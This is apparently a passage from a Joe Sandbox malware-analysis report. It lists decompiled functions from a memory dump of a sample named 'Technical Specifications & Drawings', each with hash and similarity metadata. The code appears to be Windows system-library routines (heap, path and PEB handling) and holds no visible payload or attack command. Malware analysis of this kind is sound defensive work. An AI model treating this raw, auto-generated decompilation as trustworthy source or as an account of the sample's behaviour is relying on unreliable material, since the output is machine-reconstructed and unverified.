                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • Opcode ID: a49da39d4d9609d2732b583a3d1bc0d135076e99f0f2d95aaf5af1d627324210
                                                  • Instruction ID: 3ef5678d9e39b705003ddb03a013938845e11a39f47e2ade6814bc4d1c1fbbcc
                                                  • Opcode Fuzzy Hash: a49da39d4d9609d2732b583a3d1bc0d135076e99f0f2d95aaf5af1d627324210
                                                  • Instruction Fuzzy Hash: 85413DB4A402299BDB24DF69C8C8BEAF7B8EB54300F1045E9D91997252E7709E80CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0186AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed char _v20;
                                                  				intOrPtr _v24;
                                                  				char* _t37;
                                                  				void* _t47;
                                                  				signed char _t51;
                                                  				void* _t53;
                                                  				char _t55;
                                                  				intOrPtr _t57;
                                                  				signed char _t61;
                                                  				intOrPtr _t75;
                                                  				void* _t76;
                                                  				signed int _t81;
                                                  				intOrPtr _t82;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t55 = 0;
                                                  				_v20 = _v20 & 0;
                                                  				_t75 = __edx;
                                                  				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                  				_v24 = __edx;
                                                  				_v12 = 0;
                                                  				if((_t81 & 0x01000000) != 0) {
                                                  					L5:
                                                  					if(_a8 != 0) {
                                                  						_t81 = _t81 | 0x00000008;
                                                  					}
                                                  					_t57 = E0186ABF4(_t55 + _t75, _t81);
                                                  					_v8 = _t57;
                                                  					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                  						_t76 = 0;
                                                  						_v16 = _v16 & 0;
                                                  					} else {
                                                  						_t59 = _t53;
                                                  						_t76 = E0186AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                  						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                  							_t47 = E0186AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                  							_t61 = _v20;
                                                  							if(_t61 != 0) {
                                                  								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                  								if(E0184CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                  									L017C77F0(_t53, 0, _t76);
                                                  									_t76 = 0;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					_t82 = _v8;
                                                  					L16:
                                                  					if(E017C7D50() == 0) {
                                                  						_t37 = 0x7ffe0380;
                                                  					} else {
                                                  						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  					}
                                                  					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                  						E0186131B(_t53, _t76, _t82, _v16);
                                                  					}
                                                  					return _t76;
                                                  				}
                                                  				_t51 =  *(__ecx + 0x20);
                                                  				_v20 = _t51;
                                                  				if(_t51 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t81 = _t81 | 0x00000008;
                                                  				if(E0184CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                  					_t55 = _v12;
                                                  					goto L5;
                                                  				} else {
                                                  					_t82 = 0;
                                                  					_t76 = 0;
                                                  					_v16 = _v16 & 0;
                                                  					goto L16;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction ID: 689efa371e2d28c155d3b02386da7865567d3a1a7cc448d630a07358d231ce4a
                                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction Fuzzy Hash: ED31D132B002096BEB198B69CC85BBFFBAEEF84710F058469E905F7291DA74DE40C650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E0186FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				signed int _t29;
                                                  				char* _t32;
                                                  				char* _t43;
                                                  				signed int _t80;
                                                  				signed int* _t84;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t56 = __edx;
                                                  				_t84 = __ecx;
                                                  				_t80 = E0186FD4E(__ecx, __edx);
                                                  				_v12 = _t80;
                                                  				if(_t80 != 0) {
                                                  					_t29 =  *__ecx & _t80;
                                                  					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                  					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                  						E01870A13(__ecx, _t80, 0, _a4);
                                                  						_t80 = 1;
                                                  						if(E017C7D50() == 0) {
                                                  							_t32 = 0x7ffe0380;
                                                  						} else {
                                                  							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  						}
                                                  						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                  							_push(3);
                                                  							L21:
                                                  							E01861608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                  						}
                                                  						goto L22;
                                                  					}
                                                  					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                  						_t80 = E01872B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                  						if(_t80 != 0) {
                                                  							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                  							_t77 = _v8;
                                                  							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                  								E0186C8F7(_t66, _t77, 0);
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t80 = E0186DBD2(__ecx[0xb], _t74, __edx, _a4);
                                                  					}
                                                  					if(E017C7D50() == 0) {
                                                  						_t43 = 0x7ffe0380;
                                                  					} else {
                                                  						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                  					}
                                                  					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                  						goto L22;
                                                  					} else {
                                                  						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_push(__ecx);
                                                  					_push(_t80);
                                                  					E0186A80D(__ecx[0xf], 9, __edx, _t80);
                                                  					L22:
                                                  					return _t80;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction ID: 491f8ca89d8625c3a69ead6fabd03fcb21ce52fb1f8c4320ca375395cc196a97
                                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction Fuzzy Hash: 1031E132300645AFD3269B6CDC64F6ABFAEEF85B50F184158EA46CB342DA74DE41C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E0186EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				intOrPtr _v15;
                                                  				char _v16;
                                                  				intOrPtr _v19;
                                                  				void* _v28;
                                                  				intOrPtr _v36;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed char _t26;
                                                  				signed int _t27;
                                                  				char* _t40;
                                                  				unsigned int* _t50;
                                                  				intOrPtr* _t58;
                                                  				unsigned int _t59;
                                                  				char _t75;
                                                  				signed int _t86;
                                                  				intOrPtr _t88;
                                                  				intOrPtr* _t91;
                                                  
                                                  				_t75 = __edx;
                                                  				_t91 = __ecx;
                                                  				_v12 = __edx;
                                                  				_t50 = __ecx + 0x30;
                                                  				_t86 = _a4 & 0x00000001;
                                                  				if(_t86 == 0) {
                                                  					E017C2280(_t26, _t50);
                                                  					_t75 = _v16;
                                                  				}
                                                  				_t58 = _t91;
                                                  				_t27 = E0186E815(_t58, _t75);
                                                  				_v8 = _t27;
                                                  				if(_t27 != 0) {
                                                  					E017AF900(_t91 + 0x34, _t27);
                                                  					if(_t86 == 0) {
                                                  						E017BFFB0(_t50, _t86, _t50);
                                                  					}
                                                  					_push( *((intOrPtr*)(_t91 + 4)));
                                                  					_push( *_t91);
                                                  					_t59 =  *(_v8 + 0x10);
                                                  					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                  					_push(0x8000);
                                                  					_t11 = _t53 - 1; // 0x0
                                                  					_t12 = _t53 - 1; // 0x0
                                                  					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                  					E0186AFDE( &_v12,  &_v16);
                                                  					asm("lock xadd [eax], ecx");
                                                  					asm("lock xadd [eax], ecx");
                                                  					E0186BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                  					_t55 = _v36;
                                                  					_t88 = _v36;
                                                  					if(E017C7D50() == 0) {
                                                  						_t40 = 0x7ffe0388;
                                                  					} else {
                                                  						_t55 = _v19;
                                                  						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  					}
                                                  					if( *_t40 != 0) {
                                                  						E0185FE3F(_t55, _t91, _v15, _t55);
                                                  					}
                                                  				} else {
                                                  					if(_t86 == 0) {
                                                  						E017BFFB0(_t50, _t86, _t50);
                                                  						_t75 = _v16;
                                                  					}
                                                  					_push(_t58);
                                                  					_t88 = 0;
                                                  					_push(0);
                                                  					E0186A80D(_t91, 8, _t75, 0);
                                                  				}
                                                  				return _t88;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction ID: e30907b248821e1fed00a5ec221977d2322a4843da8917ea5e21966d5517fc42
                                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction Fuzzy Hash: DF31A1766047069BC719DF28C884A6BB7AEFBD0710F04492DF556C7645EE30E905CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E018269A6(signed short* __ecx, void* __eflags) {
                                                  				signed int _v8;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				signed short _v28;
                                                  				signed int _v32;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				char* _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _v52;
                                                  				signed int _v56;
                                                  				char _v60;
                                                  				signed int _v64;
                                                  				char _v68;
                                                  				char _v72;
                                                  				signed short* _v76;
                                                  				signed int _v80;
                                                  				char _v84;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t68;
                                                  				intOrPtr _t73;
                                                  				signed short* _t74;
                                                  				void* _t77;
                                                  				void* _t78;
                                                  				signed int _t79;
                                                  				signed int _t80;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t80;
                                                  				_t75 = 0x100;
                                                  				_v64 = _v64 & 0x00000000;
                                                  				_v76 = __ecx;
                                                  				_t79 = 0;
                                                  				_t68 = 0;
                                                  				_v72 = 1;
                                                  				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                  				_t77 = 0;
                                                  				if(L017B6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                  					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                  					if(_t79 != 0 && E01826BA3() != 0) {
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0);
                                                  						_push(0x1f0003);
                                                  						_push( &_v64);
                                                  						if(E017E9980() >= 0) {
                                                  							E017C2280(_t56, 0x1898778);
                                                  							_t77 = 1;
                                                  							_t68 = 1;
                                                  							if( *0x1898774 == 0) {
                                                  								asm("cdq");
                                                  								 *(_t79 + 0xf70) = _v64;
                                                  								 *(_t79 + 0xf74) = 0x100;
                                                  								_t75 = 0;
                                                  								_t73 = 4;
                                                  								_v60 =  &_v68;
                                                  								_v52 = _t73;
                                                  								_v36 = _t73;
                                                  								_t74 = _v76;
                                                  								_v44 =  &_v72;
                                                  								 *0x1898774 = 1;
                                                  								_v56 = 0;
                                                  								_v28 = _t74[2];
                                                  								_v48 = 0;
                                                  								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                  								_v40 = 0;
                                                  								_v32 = 0;
                                                  								_v24 = 0;
                                                  								_v16 = 0;
                                                  								if(E017AB6F0(0x178c338, 0x178c288, 3,  &_v60) == 0) {
                                                  									_v80 = _v80 | 0xffffffff;
                                                  									_push( &_v84);
                                                  									_push(0);
                                                  									_push(_v64);
                                                  									_v84 = 0xfa0a1f00;
                                                  									E017E9520();
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_v64 != 0) {
                                                  					_push(_v64);
                                                  					E017E95D0();
                                                  					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                  					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                  				}
                                                  				if(_t77 != 0) {
                                                  					E017BFFB0(_t68, _t77, 0x1898778);
                                                  				}
                                                  				_pop(_t78);
                                                  				return E017EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                  			}



                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b842a7504118338c91a38848aa34e92271a26847a3edf873dc1580ee452b619
                                                  • Instruction ID: c12b94a9512190dac0bdbfbf6d02dc3527a83f7cd188b27d370e4ea717a9c7ba
                                                  • Opcode Fuzzy Hash: 2b842a7504118338c91a38848aa34e92271a26847a3edf873dc1580ee452b619
                                                  • Instruction Fuzzy Hash: 574189B1D00219AFDB21DFA9C944BEEFBF4EF48704F14812AE915E3240EB309A45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E017A5210(intOrPtr _a4, void* _a8) {
                                                  				void* __ecx;
                                                  				intOrPtr _t31;
                                                  				signed int _t32;
                                                  				signed int _t33;
                                                  				intOrPtr _t35;
                                                  				signed int _t52;
                                                  				void* _t54;
                                                  				void* _t56;
                                                  				unsigned int _t59;
                                                  				signed int _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = E017A52A5(1);
                                                  				if(_t61 == 0) {
                                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                  					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                  					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                  				} else {
                                                  					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                  					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                  				}
                                                  				_t60 = _t59 >> 1;
                                                  				_t32 = 0x3a;
                                                  				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                  					_t52 = _t60 + _t60;
                                                  					if(_a4 > _t52) {
                                                  						goto L5;
                                                  					}
                                                  					if(_t61 != 0) {
                                                  						asm("lock xadd [esi], eax");
                                                  						if((_t32 | 0xffffffff) == 0) {
                                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                                  							E017E95D0();
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                  						}
                                                  					} else {
                                                  						E017BEB70(_t54, 0x18979a0);
                                                  					}
                                                  					_t26 = _t52 + 2; // 0xddeeddf0
                                                  					return _t26;
                                                  				} else {
                                                  					_t52 = _t60 + _t60;
                                                  					if(_a4 < _t52) {
                                                  						if(_t61 != 0) {
                                                  							asm("lock xadd [esi], eax");
                                                  							if((_t32 | 0xffffffff) == 0) {
                                                  								_push( *((intOrPtr*)(_t61 + 4)));
                                                  								E017E95D0();
                                                  								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                  							}
                                                  						} else {
                                                  							E017BEB70(_t54, 0x18979a0);
                                                  						}
                                                  						return _t52;
                                                  					}
                                                  					L5:
                                                  					_t33 = E017EF3E0(_a8, _t54, _t52);
                                                  					if(_t61 == 0) {
                                                  						E017BEB70(_t54, 0x18979a0);
                                                  					} else {
                                                  						asm("lock xadd [esi], eax");
                                                  						if((_t33 | 0xffffffff) == 0) {
                                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                                  							E017E95D0();
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                  						}
                                                  					}
                                                  					_t35 = _a8;
                                                  					if(_t60 <= 1) {
                                                  						L9:
                                                  						_t60 = _t60 - 1;
                                                  						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                  						goto L10;
                                                  					} else {
                                                  						_t56 = 0x3a;
                                                  						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                  							 *((short*)(_t52 + _t35)) = 0;
                                                  							L10:
                                                  							return _t60 + _t60;
                                                  						}
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  			}



                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6d61315df4252135b77c5bab3c835ff77d9d04b729806edf2adc2b799c8fa2d
                                                  • Instruction ID: 0408229fda9cd3b6a9d9894817198c92de0ffd74ef45fc869dc557dbee3b9c5e
                                                  • Opcode Fuzzy Hash: f6d61315df4252135b77c5bab3c835ff77d9d04b729806edf2adc2b799c8fa2d
                                                  • Instruction Fuzzy Hash: 0B314831255705EBC7269B18CC84F6AF7A5FF607A0F104729F9598B2D4DB30EA00CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				signed short** _t33;
                                                  				short* _t38;
                                                  				intOrPtr* _t39;
                                                  				intOrPtr* _t41;
                                                  				signed short _t43;
                                                  				intOrPtr* _t47;
                                                  				intOrPtr* _t53;
                                                  				signed short _t57;
                                                  				intOrPtr _t58;
                                                  				signed short _t60;
                                                  				signed short* _t61;
                                                  
                                                  				_t47 = __ecx;
                                                  				_t61 = __edx;
                                                  				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                  				if(_t60 > 0xfffe) {
                                                  					L22:
                                                  					return 0xc0000106;
                                                  				}
                                                  				if(__edx != 0) {
                                                  					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                  						L5:
                                                  						E017B7B60(0, _t61, 0x17811c4);
                                                  						_v12 =  *_t47;
                                                  						_v12 = _v12 + 0xfff8;
                                                  						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                  						E017B7B60(0xfff8, _t61,  &_v12);
                                                  						_t33 = _a8;
                                                  						if(_t33 != 0) {
                                                  							 *_t33 = _t61;
                                                  						}
                                                  						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                  						_t53 = _a12;
                                                  						if(_t53 != 0) {
                                                  							_t57 = _t61[2];
                                                  							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                  							while(_t38 >= _t57) {
                                                  								if( *_t38 == 0x5c) {
                                                  									_t41 = _t38 + 2;
                                                  									if(_t41 == 0) {
                                                  										break;
                                                  									}
                                                  									_t58 = 0;
                                                  									if( *_t41 == 0) {
                                                  										L19:
                                                  										 *_t53 = _t58;
                                                  										goto L7;
                                                  									}
                                                  									 *_t53 = _t41;
                                                  									goto L7;
                                                  								}
                                                  								_t38 = _t38 - 2;
                                                  							}
                                                  							_t58 = 0;
                                                  							goto L19;
                                                  						} else {
                                                  							L7:
                                                  							_t39 = _a16;
                                                  							if(_t39 != 0) {
                                                  								 *_t39 = 0;
                                                  								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                  								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                  								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                  							}
                                                  							return 0;
                                                  						}
                                                  					}
                                                  					_t61 = _a4;
                                                  					if(_t61 != 0) {
                                                  						L3:
                                                  						_t43 = L017C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                  						_t61[2] = _t43;
                                                  						if(_t43 == 0) {
                                                  							return 0xc0000017;
                                                  						}
                                                  						_t61[1] = _t60;
                                                  						 *_t61 = 0;
                                                  						goto L5;
                                                  					}
                                                  					goto L22;
                                                  				}
                                                  				_t61 = _a4;
                                                  				if(_t61 == 0) {
                                                  					return 0xc000000d;
                                                  				}
                                                  				goto L3;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea1cc02340a1fdb41d8475610fa7e32546413a1637daa81de9b3b096f81328a1
                                                  • Instruction ID: 3647abce76d18b4c6106c4890405345ed3bbf8889b64ab6691bc15c6eaec3c7b
                                                  • Opcode Fuzzy Hash: ea1cc02340a1fdb41d8475610fa7e32546413a1637daa81de9b3b096f81328a1
                                                  • Instruction Fuzzy Hash: FD319E32A006159BD729CF2DC449A6AFBF5FF89710B0584AEE945CB354E731D880C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E017DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t39;
                                                  				intOrPtr _t45;
                                                  				intOrPtr* _t51;
                                                  				intOrPtr* _t52;
                                                  				intOrPtr* _t55;
                                                  				signed int _t57;
                                                  				intOrPtr* _t59;
                                                  				intOrPtr _t68;
                                                  				intOrPtr* _t77;
                                                  				void* _t79;
                                                  				signed int _t80;
                                                  				intOrPtr _t81;
                                                  				char* _t82;
                                                  				void* _t83;
                                                  
                                                  				_push(0x24);
                                                  				_push(0x1880220);
                                                  				E017FD08C(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                  				_t79 = __ecx;
                                                  				_t35 =  *0x1897b9c; // 0x0
                                                  				_t55 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                  				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                  				if(_t55 == 0) {
                                                  					_t39 = 0xc0000017;
                                                  					L11:
                                                  					return E017FD0D1(_t39);
                                                  				}
                                                  				_t68 = 0;
                                                  				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                  				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                  				_t7 = _t55 + 8; // 0x8
                                                  				_t57 = 6;
                                                  				memcpy(_t7, _t79, _t57 << 2);
                                                  				_t80 = 0xfffffffe;
                                                  				 *(_t83 - 4) = _t80;
                                                  				if(0 < 0) {
                                                  					L14:
                                                  					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                  					L20:
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                  					_t39 = _t81;
                                                  					goto L11;
                                                  				}
                                                  				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                  					_t81 = 0xc000007b;
                                                  					goto L20;
                                                  				}
                                                  				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                  					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                  					_t45 =  *_t59;
                                                  					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                  					 *_t59 = _t45 + 1;
                                                  					L6:
                                                  					 *(_t83 - 4) = 1;
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                  					 *(_t83 - 4) = _t80;
                                                  					if(_t68 < 0) {
                                                  						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                  						if(_t82 == 0) {
                                                  							goto L14;
                                                  						}
                                                  						asm("btr eax, ecx");
                                                  						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                  						if( *_t82 != 0) {
                                                  							 *0x1897b10 =  *0x1897b10 - 8;
                                                  						}
                                                  						goto L20;
                                                  					}
                                                  					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                  					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                  					_t51 =  *0x189536c; // 0x77575368
                                                  					if( *_t51 != 0x1895368) {
                                                  						_push(3);
                                                  						asm("int 0x29");
                                                  						goto L14;
                                                  					}
                                                  					 *_t55 = 0x1895368;
                                                  					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                  					 *_t51 = _t55;
                                                  					 *0x189536c = _t55;
                                                  					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                  					if(_t52 != 0) {
                                                  						 *_t52 = _t55;
                                                  					}
                                                  					_t39 = 0;
                                                  					goto L11;
                                                  				}
                                                  				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                  				_t68 = E017DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                  				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                  				if(_t68 < 0) {
                                                  					goto L14;
                                                  				}
                                                  				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                  				goto L6;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f536817d6eccad8f0af131d6f7deb9d50f8262b3f2bb787ccde88b3ce5c5e322
                                                  • Instruction ID: 01345e2a947e30dbcddc8badf8c589b1baaa33940d31685c15b6d6374b984c02
